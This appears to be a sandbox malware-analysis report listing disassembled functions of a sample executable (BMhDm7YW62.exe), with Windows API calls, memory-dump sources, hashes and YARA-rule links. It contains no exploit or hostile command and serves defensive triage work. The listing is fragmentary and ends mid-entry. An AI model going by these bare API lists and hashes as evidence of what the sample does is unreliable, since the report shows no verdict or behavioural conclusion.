                                                                                                                        • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                                                                                                        • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                                                                                        • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406025 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                                                                                        • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                                                                                                        • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                                                                                        • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406473 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                                                                                        • Instruction ID: ed496f49c15cb1a0cee1f91230a4d4bd76d3fd25087baa69d2252d5f7e71f344
                                                                                                                        • Opcode Fuzzy Hash: 17d2eea9f7cdce8bc4a623307af2d8c55e83d6c30150793070c9d330b5787031
                                                                                                                        • Instruction Fuzzy Hash: 30713271E00228CFDF28DFA8C8547ADBBB1FB44305F15806AD906BB281D7785A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406591 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                                                                                        • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                                                                                                        • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                                                                                                        • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004064DD Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                                                                                        • Instruction ID: 5a6a632b4197b5bad3eb6902eefc8e88da0621a447eca7476662d6aa47a1fed0
                                                                                                                        • Opcode Fuzzy Hash: a35431ca5ac5a63de0c48c0fa1b7027ef1301f6ad8cfe25f67b835d71510927c
                                                                                                                        • Instruction Fuzzy Hash: 93714571E00228CFEF28DF98C8547ADBBB1FB44305F15816AD916BB281C7789A56DF44
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401E38 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                                                                                                          • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                                                                                                          • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                                                                                                          • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                                                                                                          • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                                                                                                          • Part of subcall function 004053F8: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                                                                                                          • Part of subcall function 004053F8: CloseHandle.KERNEL32(?), ref: 0040542A
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
                                                                                                                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
                                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3521207402-0
                                                                                                                        • Opcode ID: fee99b61f809a53683fc29f07b08f3b8ec53ffd30f17739a64443d1dd851e78e
                                                                                                                        • Instruction ID: 9f74951c8685777ff7248368b05c14b320234156a546818c44ddf0e00d329478
                                                                                                                        • Opcode Fuzzy Hash: fee99b61f809a53683fc29f07b08f3b8ec53ffd30f17739a64443d1dd851e78e
                                                                                                                        • Instruction Fuzzy Hash: F0015731E04205EBCF21AFA1D984AAE7A71EF00344F54813BF905B61E1C7BC4A41EB9A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                        • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                                                                                        • Instruction ID: 9ae17229e6d33b90ed82c987c6c55cbce7d6b2b41e99f766f3e5bcfc28262e64
                                                                                                                        • Opcode Fuzzy Hash: 3f695f75208f640be867956647b5e414a31c5be601b183f87834ddd8f53d2100
                                                                                                                        • Instruction Fuzzy Hash: CA014472B242109BEB184B389C04B2A32A8E710319F10813BF841F72F1D638CC028B4D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405F28 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                          • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                                                                                                          • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                                                                                                          • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2547128583-0
                                                                                                                        • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                        • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                                                                                                        • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                                                                                                        • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0040586F Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\BMhDm7YW62.exe,80000000,00000003), ref: 00405873
                                                                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415043291-0
                                                                                                                        • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                        • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                                                                                                        • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                                                                                                        • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403511 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 11COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00403337,00000020), ref: 0040351C
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\nsfB756.tmp\, xrefs: 00403530
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsfB756.tmp\
                                                                                                                        • API String ID: 2962429428-1933228269
                                                                                                                        • Opcode ID: 69a1ec42bfd2c808f6210beb952dd846253a51cc7dcbdee1183c199696e0200a
                                                                                                                        • Instruction ID: d56dd6d0e9358e7abe0e1c75cf4fb1a02b43fa7986872cd818a2a6dcef25a25f
                                                                                                                        • Opcode Fuzzy Hash: 69a1ec42bfd2c808f6210beb952dd846253a51cc7dcbdee1183c199696e0200a
                                                                                                                        • Instruction Fuzzy Hash: 07C0123090860466D2207F78AE0B7053B58A741336B900725F174B00F2D73C6A41556E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405850 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                                                                                                        • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405866
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                        • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                                                                                                        • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                                                                                                        • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004053C3 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                                                                                                        • GetLastError.KERNEL32 ref: 004053D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1375471231-0
                                                                                                                        • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                        • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                                                                                                        • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                                                                                                        • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403081 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EDA,000000FF,00000004,00000000,00000000,00000000), ref: 00403098
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                        • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                                                                                                        • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                                                                                                        • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004030B3 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,0000BFE4), ref: 004030C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1294617403.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1294599485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294647497.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294664062.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1294718474.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_BMhDm7YW62.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 973152223-0
                                                                                                                        • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                                                                                                        • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                                                                                                        • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
